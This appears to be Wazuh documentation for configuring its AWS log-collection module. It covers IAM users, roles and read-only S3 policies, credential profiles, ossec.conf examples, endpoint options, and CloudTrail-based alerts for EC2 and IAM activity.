# apt-get update && apt-get install python3-pip

We recommend using Pip 19.3 or later to simplify the installation of the dependencies. Run this command to check your pip version.

# pip3 --version

An example output is as follows.

pip 22.0.2 from /usr/lib/python3/dist-packages/pip (python 3.10)

If your pip version is less than 19.3, run the following command to upgrade the version.

# pip3 install --upgrade pip
AWS client library for Python

Boto3 is the official package supported by Amazon to manage AWS resources. It is used to download log messages from the different AWS services supported by Wazuh. The Wazuh module for AWS is compatible with boto3 from version 1.13.1 to 1.17.85. Future boto3 releases should maintain compatibility although we cannot assure it.

Execute the following command to install the dependencies:

# pip3 install boto3==1.34.135 pyarrow==14.0.1 numpy==1.26.0
Configuring an S3 Bucket

Amazon Simple Storage Service (Amazon S3) is an object storage service that delivers industry-leading scalability, data availability, security, and performance.

The Wazuh module for AWS requires all supported AWS services, except Inspector, CloudWatch Logs, and Security Lake, to store their logs in an S3 bucket. You can use a single S3 bucket for all these services, avoiding the need to create separate buckets. Wazuh retrieves the logs from this bucket for analysis.

In this section we describe how to create an Amazon S3 bucket:

  1. On your AWS console, go to Services > Storage > S3.

    S3 storage service
  2. Click Create bucket to create a new S3 bucket.

    Create a bucket
  3. Enter the name of your S3 bucket, then click Create bucket.

    Create bucket 2
    Create bucket 3

Note

Copy the bucket ARN because it will be needed later for some AWS services.

Configuring AWS IAM Identities

In AWS Identity and Access Management (IAM), an identity represents a human user or programmatic workload that can be authenticated and authorized to perform actions in AWS. The Wazuh module for AWS requires authentication and authorization through an IAM identity to integrate with supported AWS services.

In the following sections, we describe how to create an IAM user group, how to create an AWS IAM user with access credentials, and how to add the user to the group.

Creating an IAM user group
  1. Create a user group that an AWS IAM user will be added to.

    1. On the AWS console, search for iam and click IAM from the results.

      Find IAM
    2. Go to User groups and click Create group to create a new group.

      Click Create group
    3. Assign a name for the group, scroll down, and click Create group.

      Click Create group 2
      Click Create group 3
    4. Confirm the group has been successfully created.

      Confirm group creation
Creating an IAM user

Wazuh requires an AWS IAM user with the necessary permissions to collect log data from the different AWS services. We show below how to create a new IAM user in your AWS environment and obtain the access credentials.

  1. Create a new IAM user and add it to a user group:

    1. On your AWS console, navigate to Services > IAM > Users > Create user.

      Create IAM user
    2. Assign a username and click Next.

      Create IAM user
    3. Assign the user to the previously created group and click Next to proceed.

      Add user to group
    4. Review the selected options and click Create user.

      Click Create user
    5. Confirm the user creation

      Confirm user creation
  2. Obtain the necessary access credentials for the IAM user.

    1. Click on the created IAM user, go to Security credentials, scroll down to Access keys, and click Create access key.

      Create access key
    2. Select and confirm the Command Line Interface (CLI) use case and click Next.

      Command Line Interface selection
    3. Assign a description tag value and click Create access key.

      Create access key
    4. Save the access credentials, you will use them later to configure the Wazuh module for AWS. If you don't copy the credentials before you click Done, you cannot recover it later. However, you can create a new secret access key.

      Save access keys

Depending on the service that will be monitored, the AWS IAM user will need a different set of permissions. The permissions required for each service are explained on each page of the supported services listed in the supported services section.

Configuring AWS policy

In AWS, a policy is an entity that links permissions with an identity or resource. The permissions in a policy determine whether a request is allowed or denied.

In this section, we describe how to create an AWS policy and how to attach the policy to a group.

Creating an AWS policy

Depending on the AWS service that will be monitored, the AWS IAM user will need different sets of permissions. The permissions required for each AWS service are explained on each page of the supported services section.

Follow the steps below on your AWS console to create an AWS policy that collects logs from an S3 bucket.

  1. On the AWS console, search for iam and click IAM from the results.

    Find IAM
  2. Click Policies > Create policy.

    Create policy
  3. Switch to JSON view, remove the default statement, and paste the following configuration. Replace <WAZUH_AWS_BUCKET> with the name of the previously created S3 bucket. In this example, the policy allows the IAM user to return and retrieve an object from the specified S3 bucket.

    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "GetS3Logs",
                "Effect": "Allow",
                "Action": [
                    "s3:GetObject",
                    "s3:ListBucket"
                ],
                "Resource": [
                    "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                    "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
                ]
            }
        ]
    }
    
    1. Click Next to proceed to the next step.

      Create policy
    2. Click Create policy to create a new policy.

      Create policy
    3. Confirm the policy creation.

      Confirm policy creation
Attaching a policy to an IAM user group

After you create a policy, you can attach it to groups, users, or roles. In this guide, we show how to create a group and how to attach a policy to a group using the AWS console.

  1. On the AWS console, search for iam and click IAM from the results.

    Find IAM
  2. Navigate to User groups and click on a previously created group.

    Click user group
  3. Navigate to Permissions , click on Add permissions, then Attach policies.

    Attach policies
  4. Search for the policy, select the checkbox next to it, and click Attach policies to attach it to the group.

    Select and attach the policy
  5. Confirm the policy is attached to the group.

    Confirm policy creation
Configuring AWS credentials

You can configure the Wazuh module for AWS on the Wazuh server (which also behaves as the Wazuh agent) or on a Wazuh agent installed on a Linux endpoint. Depending on the authentication option used, the Wazuh module for AWS will require access credentials of an AWS Identity and Access Management (IAM) identity to collect log data from the different AWS services. These credentials need to be stored in a file named .aws/credentials on the Wazuh server or agent.

You need to create the credentials file using the root user because the wazuh-modulesd daemon runs with root permission. Ensure the .aws/credentials file is saved in the home directory of the root user, therefore the absolute file path will be /root/.aws/credentials. This file is required for all authentication options except IAM roles for EC2 instances.

In the following sections, we describe how to configure the Wazuh module for AWS to pull AWS services logs using these credentials.

Authenticating options

Credentials can be loaded from different locations. You can specify the credentials in a file, assume an IAM role, or load them from other Boto3 supported locations.

In this section, we describe the several methods of adding the AWS credentials to Wazuh and how to configure the Wazuh module for AWS to use the credentials.

Profiles

Profiles are logical groups of configuration settings. You can set up multiple profiles in the following files.

  • /root/.aws/credentials: Each profile defines the access keys for a previously created IAM user.

  • /root/.aws/config: Each corresponding profile specifies an AWS region.

In the example below, the /root/.aws/credentials file defines the default, dev, and prod profiles.

[default]
aws_access_key_id=foo
aws_secret_access_key=bar

[dev]
aws_access_key_id=foo2
aws_secret_access_key=bar2

[prod]
aws_access_key_id=foo3
aws_secret_access_key=bar3

The /root/.aws/config file specifies the AWS region for each profile:

[default]
region = us-east-1

[profile dev]
region = us-east-1

[profile prod]
region = us-east-1

After setting up the profiles, define which one the Wazuh module for AWS will use to collect logs. Configure this in the /var/ossec/etc/ossec.conf file of the Wazuh server or agent. The example below configures the module to pull Amazon CloudTrail logs from the specified bucket using the prod profile.

<bucket type="cloudtrail">
  <name>wazuh-s3-bucket</name>
  <aws_profile>prod</aws_profile>
</bucket>
IAM Roles

An IAM role is an identity within your AWS account with specific permissions. It's similar to an IAM user but isn't associated with a specific person. Trusted entities can also use IAM roles to interact with different AWS services. An IAM role can be assumed by AWS services, applications running on Amazon EC2 instances, and AWS Identity and Access Management (IAM) users.

Note

This authentication method requires some credentials to be previously added to the configuration using any other authentication method.

This section shows how to create a sample IAM role with read-only permissions to pull data from a bucket:

  1. Go to Services > Security, Identity, & Compliance > IAM.

    Select IAM
  2. Go to Roles on the left side of the AWS console and click Create role.

    Create role
  3. Choose AWS service as Trusted entity type, S3 as service and Use case then click Next.

    Select trusted entity
  4. Select a previously created policy and click Next.

    Select policy
  5. Give the role a descriptive name and click Create role.

    Assign name to role
    Create role
  6. Access the role Summary and click on its Policy name.

    Click a policy
  7. Add permissions so the new role can do sts:AssumeRole action.

    Add STS AssumeRole action
  8. Go back to the role Summary, go to the Trust relationships tab, and click Edit trust policy.

    Edit trust relationship
  9. Add the AWS IAM user to the Principal tag and click Update policy.

    Add user to Principal
  10. After updating the trust policy, copy the Amazon Resource Name (ARN) of the role as this will be used to configure the Wazuh module for AWS.

    Update trust policy

It is necessary to configure the Wazuh module for AWS using the /var/ossec/etc/ossec.conf file of the Wazuh server or agent. In the example below, we configure the Wazuh module for AWS to pull Amazon CloudTrail logs from the specified bucket using the default profile and the Wazuh-IAM-Role IAM role.

<bucket type="cloudtrail">
   <name><WAZUH_AWS_BUCKET></name>
   <aws_profile>default</aws_profile>
   <iam_role_arn>arn:aws:iam::xxxxxxxxxxx:role/Wazuh-IAM-Role</iam_role_arn>
</bucket>
IAM roles for EC2 instances

You can use IAM roles and assign them to EC2 instances so there's no need to insert authentication parameters in the /var/ossec/etc/ossec.conf file of the Wazuh server or agent. This is the recommended configuration if the Wazuh server or agent is running on an EC2 instance. Find more information about IAM roles on EC2 instances in the official Amazon AWS documentation.

In the example below, we configure the Wazuh module for AWS to pull Amazon CloudTrail logs from the specified bucket using the IAM roles for EC2 instances.

<bucket type="cloudtrail">
  <name><WAZUH_AWS_BUCKET></name>
</bucket>
Considerations for the Wazuh module for AWS configuration
First execution

The Wazuh module for AWS will only fetch the AWS services logs from the date the module is first executed. If there are older logs that need to be fetched during the first execution of the module, you need to use the only_logs_after option.

Note

If you need to fetch older logs after the first execution of the Wazuh module for AWS, see the Reparse section.

Filtering

If the S3 bucket contains a long history of logs and its directory structure is organized by dates, it's possible to filter which logs will be read by Wazuh. There are multiple configuration options to do so:

  • only_logs_after: Allows filtering logs produced after a given date. The date format must be YYYY-MMM-DD. For example, 2018-AUG-21 would filter logs generated on or after the 21st of August 2018.

  • aws_account_id: This option will only work on CloudTrail, VPC, and Config buckets. If you have logs from multiple accounts, you can filter which ones will be read by Wazuh. You can specify multiple IDs separating them by commas.

  • regions: Works only with CloudTrail, VPC, Config buckets, and Inspector service. Use it to filter which regions Wazuh reads when you have logs from multiple regions. Separate multiple regions with commas.

  • path: If your logs are stored in a given path in an S3 bucket, this option can be specified. For example, to read logs stored in the directory vpclogs/, it is necessary to specify the path vpclogs in the Wazuh module for AWS configuration. It can also be specified with / or \.

  • aws_organization_id: This option will only work on CloudTrail buckets. If you have configured an organization, you need to specify the name of the AWS organization by using this parameter.

In the /var/ossec/etc/ossec.conf file of the Wazuh server or agent, the configuration will be similar to this.

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>
  <!-- CloudTrail, two regions, path, account_id, organization_id and logs after January 2018 -->
  <bucket type="cloudtrail">
    <name><WAZUH_AWS_BUCKET></name>
    <aws_profile>default</aws_profile>
    <aws_account_id>123456789012</aws_account_id>
    <regions>us-east-1,us-east-2</regions>
    <path>wazuh-logs</path>
    <only_logs_after>2018-JAN-01</only_logs_after>
    <aws_organization_id>AWS-ORG-1</aws_organization_id>
  </bucket>
</wodle>
Older logs

The Wazuh module for AWS only looks for new logs in buckets based on the key of the last processed log object, which includes the datetime stamp. After the integration has processed logs, it cannot retrieve logs that are older than the processed ones, even if you respecify the only_logs_after option. The logs older than the first one processed will be ignored and not ingested into Wazuh. This is true for all supported services except the CloudWatch Logs service.

On the other hand, when monitoring the CloudWatch Logs service, the Wazuh module for AWS can process logs older than the first one processed. To do so, specify an older only_logs_after value, and the Wazuh module for AWS will process all logs between the value set for only_logs_after and the first log executed without generating duplicate alerts.

In this Wazuh module for AWS configuration in /var/ossec/etc/ossec.conf, when executed for the first time, the Wazuh module for AWS will process CloudTrail logs from 1st of January 2018 till the present day. If the only_logs_after value is specified after the first execution, it will not process the older logs.

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>
  <!-- CloudTrail, two regions, and logs after January 2018 -->
  <bucket type="cloudtrail">
    <name><WAZUH_AWS_BUCKET></name>
    <aws_profile>default</aws_profile>
    <regions>us-east-1,us-east-2</regions>
    <only_logs_after>2018-JAN-01</only_logs_after>
  </bucket>
</wodle>

Note

If you need to process older logs after the Wazuh module for AWS has been executed for the first time, see the Reparse section.

In this Wazuh module for AWS configuration in /var/ossec/etc/ossec.conf file, regardless of when the Wazuh module for AWS is executed, it will process CloudWatch logs from 1st of January 2018 till the present day.

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>
  <!-- CloudWatch, two regions, and logs after January 2018 -->
    <service type="cloudwatchlogs">
        <aws_profile>default</aws_profile>
        <aws_log_groups>log_group1,log_group2</aws_log_groups>
        <only_logs_after>2018-JAN-01</only_logs_after>
        <regions>us-east-1,us-west-1,eu-central-1</regions>
    </service>
</wodle>
Reparse

Using the reparse option will fetch and process every log from the starting point until the present. The only_logs_after value sets the time for the starting point. If you don't provide an only_logs_after value, the Wazuh module for AWS uses the date of the first log processed as the starting point. This process may generate duplicate alerts.

To collect and process older logs loaded into the S3 bucket, you need to run the Wazuh module for AWS manually using the --reparse option. In the example below, we manually run the Wazuh module for AWS using the --reparse option on a Wazuh server.

# /var/ossec/wodles/aws/aws-s3 -b 'wazuh-example-bucket' --reparse --only_logs_after '2021-Jun-10' --debug 2

The --debug 2 parameter produces verbose output. This is useful to show the script is working, especially when handling a large amount of data.

Connection configuration for retries

Some calls to AWS services may fail when made in highly congested environments. The AWS pip dependencies client raises ClientError exceptions describing the errors. This kind of exception often needs repeating the call, without further handling. To help retry these calls, Boto3 provides retries. This feature allows retrying client calls to AWS services when you experience errors like ThrottlingException.

Users can customize two retry configurations.

  • retry_mode: legacy, standard, and adaptive.

    • Legacy mode is the default retry mode. It sets the older version 1 for the retry handler. This includes:

      • Retry attempts for a limited number of errors/exceptions.

      • A default value of 5 for maximum call attempts.

    • Standard mode sets the updated version 2 for the retry handler. It includes:

      • Extended functionality over that found in the legacy mode where retry attempts apply to an expanded list of errors/exceptions.

      • A default value of 3 for maximum call attempts.

    • Adaptive mode is an experimental retry mode. It includes all the features of the standard mode. This mode offers flexibility in client-side retries. Retries adapt to the error/exception state response from an AWS service.

  • max_attempts: The maximum number of attempts including the initial call. This configuration can override the default value set by the retry mode.

You can specify the retry configuration in the /root/.aws/config configuration file. The profile section must include the max_attempts, retry_mode, and region settings.

It is important to use the same profile as the one you chose as your authentication method profile. If the authentication method lacks a profile, then the [Default] profile must include the configurations. If the configuration file is missing, the Wazuh module for AWS defines the following values by default:

  • retry_mode=standard

  • max_attempts=10

The following example of a /root/.aws/config file sets retry parameters for the dev profile:

[profile dev]
region=us-east-1
max_attempts=5
retry_mode=standard
Additional configuration

Wazuh supports additional configuration options found in the /root/.aws/config file. The supported keys are the primary keys stated in the Boto3 configuration. Supported keys are:

  • region_name

  • signature_version

  • s3

  • proxies

  • proxies_config

  • retries

The following example of a /root/.aws/config file sets the supported configuration for the dev profile:

[profile dev]
region = us-east-1
output = json
max_attempts = 5
retry_mode = standard

dev.s3.max_concurrent_requests = 10
dev.s3.max_queue_size = 1000
dev.s3.multipart_threshold = 64MB
dev.s3.multipart_chunksize = 16MB
dev.s3.max_bandwidth = 50MB/s
dev.s3.use_accelerate_endpoint = true
dev.s3.addressing_style = virtual

dev.proxy.host = proxy.example.com
dev.proxy.port = 8080
dev.proxy.username = your-proxy-username
dev.proxy.password = your-proxy-password

dev.proxy.ca_bundle = /path/to/ca_bundle.pem
dev.proxy.client_cert = /path/to/client_cert.pem
dev.proxy.use_forwarding_for_https = true

signature_version = s3v4

Note

All s3 and proxy configuration sections must start with [profile <PROFILE_NAME>].

To configure multiple profiles for the integration, declare each profile section in /root/.aws/config with [profile <PROFILE_NAME>]. If you don't declare a profile section in this configuration file, Wazuh uses the default profile.

Configuring multiple services

Below is an example of different AWS services configuration:

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>

  <!-- Inspector, two regions, and logs after January 2018 -->
  <service type="inspector">
    <aws_profile>default</aws_profile>
    <regions>us-east-1,us-east-2</regions>
    <only_logs_after>2018-JAN-01</only_logs_after>
  </service>

  <!-- GuardDuty, 'production' profile -->
  <bucket type="guardduty">
    <name><WAZUH_AWS_BUCKET></name>
    <path>guardduty</path>
    <aws_profile>production</aws_profile>
  </bucket>

  <!-- Config, 'default' profile -->
  <bucket type="config">
    <name><WAZUH_AWS_BUCKET></name>
    <path>config</path>
    <aws_profile>default</aws_profile>
  </bucket>

  <!-- KMS, 'dev' profile -->
  <bucket type="custom">
    <name><WAZUH_AWS_BUCKET></name>
    <path>kms_compress_encrypted</path>
    <aws_profile>dev</aws_profile>
  </bucket>

  <!-- CloudTrail, 'default' profile, without 'path' tag -->
  <bucket type="cloudtrail">
    <name><WAZUH_CLOUDTRAIL></name>
    <aws_profile>default</aws_profile>
  </bucket>

  <!-- CloudTrail, 'dev' profile, and 'us-east-1' region -->
  <bucket type="cloudtrail">
    <name><WAZUH_AWS_BUCKET></name>
    <path>dev-cloudtrail</path>
    <regions>us-east-1</regions>
    <aws_profile>dev</aws_profile>
  </bucket>

</wodle>

Where:

  • <disabled> enables or disables the Wazuh module for AWS.

  • <interval> is the time interval between module execution.

  • <run_on_start> execute the Wazuh module for AWS immediately after the Wazuh service starts.

  • <skip_on_error> skip a log with an error and continue processing other logs.

  • <service type> indicates the service configured. The available types are cloudwatchlogs, and inspector.

  • <aws_profile> a valid profile name from the AWS credential file or config file with permission to access the service.

  • <regions> a comma-separated list of regions to limit parsing of logs.

  • <only_logs_after> parses only logs from that date onwards.

  • <bucket type> indicates the service configured.

  • <name> the name of the S3 bucket from where logs are read.

  • <path> the path or prefix for the bucket.

  • <regions> A comma-separated list of regions to limit parsing of logs. Only works with CloudTrail buckets.

Note

Check the Wazuh module for AWS reference manual to learn more about each setting.

Using VPC and FIPS endpoints

In AWS, a VPC (Virtual Private Cloud) is a virtual network dedicated to your AWS account. It provides an isolated environment where you can launch AWS resources such as EC2 instances, RDS databases, and more.

FIPS (Federal Information Processing Standards) endpoints in AWS refer to endpoints that enforce FIPS 140-2 compliance for cryptographic modules. When you enable a FIPS endpoint, AWS ensures that any cryptographic operations performed by the endpoint use FIPS 140-2 validated cryptographic libraries.

Learn how to integrate the Wazuh module for AWS with VPC and FIPS endpoints.

VPC endpoints

VPC endpoints reduce VPC traffic costs by enabling direct connections to supported AWS services, eliminating the need for public IPs.

The Wazuh module for AWS can pull logs from an AWS S3 bucket regardless of the service the logs originate from. Wazuh can utilize VPC endpoints for this purpose if it is running within a Virtual Private Cloud (VPC). The same applies to the other AWS services the Wazuh module for AWS supports, such as CloudWatchLogs, provided that they are compatible with VPC endpoints. The list of AWS services supporting VPC endpoints can be checked here.

Configure the service_endpoint and sts_endpoint tags in the /var/ossec/etc/ossec.conf file. This specifies the VPC endpoint URL for obtaining the data and for logging into STS when an IAM role was specified, respectively.

The following is an example of a valid configuration:

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>

  <bucket type="cloudtrail">
    <name><WAZUH_CLOUDTRAIL></name>
    <aws_profile>default</aws_profile>
    <service_endpoint>https://bucket.xxxxxx.s3.us-east-2.vpce.amazonaws.com</service_endpoint>
  </bucket>

  <bucket type="cloudtrail">
    <name>wazuh-cloudtrail-2</name>
    <aws_profile>default</aws_profile>
    <iam_role_arn>arn:aws:iam::xxxxxxxxxxx:role/wazuh-role</iam_role_arn>
    <sts_endpoint>xxxxxx.sts.us-east-2.vpce.amazonaws.com</sts_endpoint>
    <service_endpoint>https://bucket.xxxxxx.s3.us-east-2.vpce.amazonaws.com</service_endpoint>
  </bucket>

  <service type="cloudwatchlogs">
    <aws_profile>default</aws_profile>
    <regions>us-east-2</regions>
    <aws_log_groups>log_group_name</aws_log_groups>
    <service_endpoint>https://xxxxxx.logs.us-east-2.vpce.amazonaws.com</service_endpoint>
  </service>

</wodle>
FIPS endpoints

Wazuh supports the use of AWS FIPS endpoints to comply with the Federal Information Processing Standard (FIPS) Publication 140-2. Depending on the service and region of choice, a different endpoint must be selected from the AWS FIPS endpoints list. Specify the selected endpoint in the /var/ossec/etc/ossec.conf file using the service_endpoint tag.

The following is an example of a valid configuration.

<wodle name="aws-s3">
  <disabled>no</disabled>
  <interval>10m</interval>
  <run_on_start>yes</run_on_start>
  <skip_on_error>yes</skip_on_error>

  <service type="cloudwatchlogs">
    <aws_profile>default</aws_profile>
    <regions>us-east-2</regions>
    <aws_log_groups>log_group_name</aws_log_groups>
    <service_endpoint>logs-fips.us-east-2.amazonaws.com</service_endpoint>
  </service>

</wodle>
Supported services

All services, except Inspector, CloudWatch Logs, and Security Lake, get their data from log files stored in an S3 bucket. These services store their data into log files which are configured inside <bucket type='TYPE'> </bucket> tags. Inspector and CloudWatch Logs services are configured inside <service type='inspector'> </service> and <service type='cloudwatchlogs'> </service> tags, respectively. To collect logs from Amazon Security Lake buckets, use <subscriber type='TYPE'> </subscriber> tags.

The next table contains the most relevant information about configuring each service in the /var/ossec/etc/ossec.conf file, as well as the path where the logs will be stored in the bucket if the corresponding service uses them as its storage medium:

Provider

Service

Configuration tag

Type

Path to logs

Required permission

Amazon

CloudTrail

bucket

cloudtrail

<WAZUH_AWS_BUCKET>/<prefix>/AWSLogs/<suffix>/<organization_id>/<ACCOUNT_ID>/CloudTrail/<REGION>/<year>/<month>/<day>

Policy configuration

Amazon

VPC

bucket

vpcflow

<WAZUH_AWS_BUCKET>/<prefix>/AWSLogs/<suffix>/<ACCOUNT_ID>/vpcflowlogs/<REGION>/<year>/<month>/<day>

Policy configuration

Amazon

Config

bucket

config

<WAZUH_AWS_BUCKET>/<prefix>/AWSLogs/<suffix>/<ACCOUNT_ID>/Config/<REGION>/<year>/<month>/<day>

Policy configuration

Amazon

KMS

bucket

custom

<WAZUH_AWS_BUCKET>/<prefix>/<year>/<month>/<day>

Policy configuration

Amazon

Macie

bucket

custom

<WAZUH_AWS_BUCKET>/<prefix>/<year>/<month>/<day>

Policy configuration

Amazon

Trusted Advisor

bucket

custom

<WAZUH_AWS_BUCKET>/<prefix>/<year>/<month>/<day>

Policy configuration

Amazon

GuardDuty

bucket

guardduty

<WAZUH_AWS_BUCKET>/<prefix>/<year>/<month>/<day>/<hh>

Policy configuration

Amazon

WAF

bucket

waf

<WAZUH_AWS_BUCKET>/<prefix>/<year>/<month>/<day>/<hh>

Policy configuration

Amazon

S3 Server Access logs

bucket

server_access

<WAZUH_AWS_BUCKET>/<prefix>

Policy configuration

Amazon

Inspector

service

inspector

Policy configuration

Amazon

CloudWatch Logs

service

cloudwatchlogs

Policy configuration

Amazon

Amazon ECR Image scanning

service

cloudwatchlogs

Policy configuration

Cisco

Umbrella

bucket

cisco_umbrella

<WAZUH_AWS_BUCKET>/<prefix>/<year>-<month>-<day>

Policy configuration

Amazon

ALB

bucket

alb

<WAZUH_AWS_BUCKET>/<prefix>/AWSLogs/<ACCOUNT_ID>/elasticloadbalancing/<REGION>/<year>/<month>/<day>

Policy configuration

Amazon

CLB

bucket

clb

<WAZUH_AWS_BUCKET>/<prefix>/AWSLogs/<ACCOUNT_ID>/elasticloadbalancing/<REGION>/<year>/<month>/<day>

Policy configuration

Amazon

NLB

bucket

custom

<WAZUH_AWS_BUCKET>/<prefix>/<year>/<month>/<day>

Policy configuration

Amazon

Amazon Security Lake

subscriber

security_lake

Policy configuration

Amazon

Custom Logs Buckets

subscriber

buckets

Amazon Simple Queue Service

Amazon

Security Hub

subscriber

security_hub

AWS CloudTrail

AWS CloudTrail is a service that enables auditing of your AWS account. With CloudTrail, you can log, monitor, and retain account activity related to actions across your AWS infrastructure. This service provides the event history of your AWS account activity, such as actions taken through the AWS Management Console, AWS SDKs, command line tools, and other AWS services.

AWS configuration

The following sections cover how to configure the Amazon CloudTrail service to integrate with Wazuh.

Amazon CloudTrail configuration
  1. Create a new S3 bucket. If you want to use an already existing one, skip this step.

  2. On your AWS console, search for “cloudtrail” in the search bar at the top of the page or go to Management & Governance > CloudTrail.

  3. Click Create trail to create a new trail.

  4. Assign a Trail Name and choose the S3 bucket that will store the CloudTrail logs (remember the name you provide here, you’ll need to reference it the Wazuh module for AWS configuration). If Log file SSE-KMS encryption is enabled, assign a name for a new AWS KMS alias or choose an existing one:

    Note

    The standard file system AWS CloudTrail will create has this structure:

    <WAZUH_AWS_BUCKET>/<PREFIX>/AWSLogs/<ACCOUNT_ID>/CloudTrail/<REGION>/<YEAR>/<MONTH>/<DAY>
    

    The structure may change depending on the different configurations of the services, or changing of the <WAZUH_AWS_BUCKET> and <PREFIX> values by the user.

  5. Choose log events to be recorded and click Next.

  6. Review the configuration and click Create trail.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process AWS CloudTrail logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="cloudtrail">
        <name><WAZUH_AWS_BUCKET></name>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    

    Note

    In this example, the aws_profile authentication parameter was used. Check the credentials section to learn more about the different authentication options and how to use them.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
CloudTrail use cases

Below you find examples of some of how Wazuh integrates with CloudTrail to monitor EC2 and IAM events. This enhances the security monitoring capabilities of AWS environments by providing near real-time detection of security incidents and compliance violations.

EC2

Amazon EC2 (Elastic Compute Cloud) provides scalable computing capacity in the cloud. When using this service, it is highly recommended to monitor it for intrusion attempts or other unauthorized actions performed against your cloud infrastructure.

Below are some use cases for EC2 monitoring.

Run a new instance in EC2

When a user creates a new instance in EC2, a CloudTrail event is generated. As previously mentioned, the log message is collected by the Wazuh agent, and forwarded to the Wazuh manager for analysis. The following alerts with rule ID 80202 will be shown on the Wazuh dashboard, it shows data such as instance type, the user who created it, or the creation date.

When a user tries to run an instance without relevant permissions, then the following alert with rule ID 80203 will be shown on the Wazuh dashboard.

Start instances in EC2

When an EC2 instance is started, the following alerts with rule ID 80202 will be shown on the Wazuh dashboard. It shows information such as the instance ID and the user who started it.

If a user tries to start instances without relevant permissions the following alert will be shown on the Wazuh dashboard.

Stop instances in EC2

When an EC2 instance is stopped, the following alerts with rule ID 80202 will be shown on the Wazuh dashboard.

If a user tries to stop instances without relevant permissions, the following alert with rule ID 80203 will be shown on the Wazuh dashboard.

Create security groups in EC2

When a new EC2 security group is created, the following alerts with rule ID 80202 is shown on the Wazuh dashboard. It shows information such as the user who created it and information about the security group.

Allocate a new Elastic IP address

If a new Elastic IP address is allocated, the following with rule ID 80202 alerts will be shown on the Wazuh dashboard.

Associate a new Elastic IP address

If an Elastic IP address is associated, the following alert with rule ID 80202 will be shown on the Wazuh dashboard.

IAM

Identity and Access Management (IAM) allows you to create and manage AWS users and groups, and manage permissions to allow and deny their access to AWS resources. You can use the AWS IAM log data to monitor user access to AWS services and resources.

Below are some use cases for IAM events.

Create a user account

When we create a new user account in IAM, a CloudTrail event is generated. As previously mentioned, the log message is collected by the Wazuh agent, and forwarded to the Wazuh server for analysis. When a user account is created, the following alerts with rule ID 80202 will appear on the Wazuh dashboard. You can see the username of the created user, the time it was created, and who created it.

Create a user account without permissions

If an unauthorized user attempts to create new users, the following alert with rule ID 80250 will be shown on the Wazuh dashboard. It will show you which user has tried to create a user account and the username it tried to create.

User login failed

When a user tries to log in with an invalid password, the following alerts with rule ID 80254 will be shown on the Wazuh dashboard. There will be shown data such as the user who tried to log in and the browser it was using.

Possible break-in attempt

When more than four consecutive unsuccessful login attempts to the AWS console occur in a 360-second time window, the following alert with rule ID 80255 will be shown on the Wazuh dashboard.

Login success

After a successful login, the following alerts with rule ID 80253 will be shown on the Wazuh dashboard. It shows the user who logged in, the browser it used, and other useful information.

You can create visualizations like this on the Wazuh dashboard for IAM events by following the custom dashboard guide:

Pie Chart

Stacked Groups

Amazon Virtual Private Cloud (VPC)

Amazon Virtual Private Cloud (Amazon VPC) lets users provision a logically isolated section of the AWS Cloud where they can launch AWS resources in a virtual network that they define. Users have complete control over their virtual networking environment, including the selection of their IP address range, creation of subnets, and configuration of route tables and network gateways. Users can use both IPv4 and IPv6 in their VPC for secure and easy access to resources and applications.

Amazon configuration

The following sections cover how to configure the Amazon VPC service to integrate with Wazuh.

  1. Go to S3 buckets, select an existing S3 bucket or create a new one, then copy the Amazon Resource Name (ARN) of the S3 bucket.

  2. On your AWS console, go to Services > Compute > EC2.

  3. Go to Network & Security > Network Interfaces on the left menu. Select a network interface and select Create flow log on the Actions menu.

  4. Change all fields to look like the following screenshot and paste the Amazon Resource Name (ARN) of the previously created bucket.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

